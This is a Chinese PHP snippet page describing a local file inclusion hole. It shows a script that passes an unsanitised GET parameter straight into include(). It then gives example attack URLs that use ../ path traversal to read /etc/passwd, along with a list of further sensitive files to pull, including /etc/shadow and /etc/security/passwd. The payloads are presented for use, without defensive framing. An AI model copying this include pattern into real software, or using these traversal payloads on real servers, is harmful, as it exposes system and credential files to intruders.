php 伪造本地文件包含漏洞的代码

yipeiwu_com6年前 (2020-03-06)PHP代码库

代码:

 
<?php 
$page=$_GET['page']; 
include($page.'php'); 
?> 

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

返回列表

上一篇：Python字符转换

下一篇：PHP生成静态页面详解

PHP 木马攻击防御技巧

1、防止跳出web目录首先修改httpd.conf，如果你只允许你的php脚本程序在web目录里操作，还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/us...

PHP中include/require/include_once/require_once使用心得

最近一直在抽时间来学习PHP，据说PHP是世界上最好的语言，于是各大论坛炸开了锅！哈哈，我们这里不是来讨论哪门语言是最好的语言，我们是在学习PHP中经常使用到的文件引入的四种方式的特点及...

了解PHP的返回引用和局部静态变量

先阅读手册 ========== 从函数返回一个引用，必须在函数声明和指派返回值给一个变量时都使用引用操作符 & ：复制代码代码如下: <?php&nbs...

php常量详细解析

一、常量常量是一个简单值的标识符（名字）。如同其名称所暗示的，在脚本执行期间该值不能改变（除了所谓的魔术常量，它们其实不是常量）。常量默认为大小写敏感。按照惯例常量标识符总是大写的。...

php-perl哈希算法实现(times33哈希算法)

复制代码代码如下:APR_DECLARE_NONSTD(unsigned int) apr_hashfunc_default(const char *char_key, &n...

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

PHP 木马攻击防御技巧

PHP中include/require/include_once/require_once使用心得

了解PHP的返回引用和局部静态变量

php常量详细解析

php-perl哈希算法实现(times33哈希算法)

© YiPeiWu.com 【宜配屋】粤ICP备17031333号

Powered By Z-BlogPHP. Theme by TOYEAN.

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

PHP 木马攻击防御技巧

PHP中include/require/include_once/require_once使用心得

了解PHP的返回引用和局部静态变量

php常量详细解析

php-perl哈希算法实现(times33哈希算法)

© YiPeiWu.com 【宜配屋】 粤ICP备17031333号 var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?8aa60ae04b767b2af31903508928acc0"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();

Powered By Z-BlogPHP. Theme by TOYEAN.

© YiPeiWu.com 【宜配屋】粤ICP备17031333号